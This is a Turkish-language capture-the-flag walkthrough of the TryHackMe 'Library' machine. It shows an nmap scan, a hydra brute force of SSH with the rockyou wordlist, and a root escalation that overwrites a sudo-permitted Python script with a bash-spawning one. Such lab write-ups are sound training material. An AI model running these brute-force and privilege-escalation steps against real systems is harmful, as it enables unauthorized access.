Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Library” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.151.209
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-08 10:47 +03
Nmap scan report for 10.10.151.209
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds
2 — HTTP sayfasına gittiğimde “meliodas, root, Anonymous, www-data” gibi kullanıcı isimleri. görüyorum. “robots.txt” dosyasına baktığımda ise içinde “rockyou” yazıyor. Buradan bir kullanıcıya brute force saldırısı yapmam gerektiğini anlıyorum. Bulduğum kullanıcılardan en mantıklı olanı “meliodas” kullanıcısına brute force saldırısı başlatıyorum.
[root:/home/alper/Desktop/TRYHACKME]# curl http://10.10.151.209/robots.txt
User-agent: rockyou
Disallow: /#
[root:/home/alper/Desktop/TRYHACKME]# hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.151.209
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-08 10:51:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.151.209:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 10.10.151.209 login: meliodas password: *CENSORED*
3 — SSH bağlantısını kurduktan sonra ilk bayrağımı elde ediyorum.
[root:/home/alper/Desktop/TRYHACKME]# ssh meliodas@10.10.151.209
*
*
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py user.txt
meliodas@ubuntu:~$ cat user.txt
*CENSORED*
4 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum.
meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
5 — “bak.py” dosyasını silip yerine aynı adda bir dosya açıyorum. Açtığım dosyanın içine aşağıdaki kodu giriyorum. Bu kod sayesinde sudo yetkisi ile çalıştırdığım python yetkisi ile root yetkisine sahip bir shell elde edeceğim.
meliodas@ubuntu:~$ rm bak.py
rm: remove write-protected regular file 'bak.py'? y
meliodas@ubuntu:~$ ls
user.txt
meliodas@ubuntu:~$ cat > bak.py << EOF
> import os
> os.system("/bin/bash")
> EOF
6 — Root kullanıcısına geçtikten sonra ikinci bayrağı da elde ediyorum.
meliodas@ubuntu:~$ sudo /usr/bin/python /home/meliodas/bak.py
root@ubuntu:~# whoami
root
root@ubuntu:~# cat /root/root.txt
*CENSORED*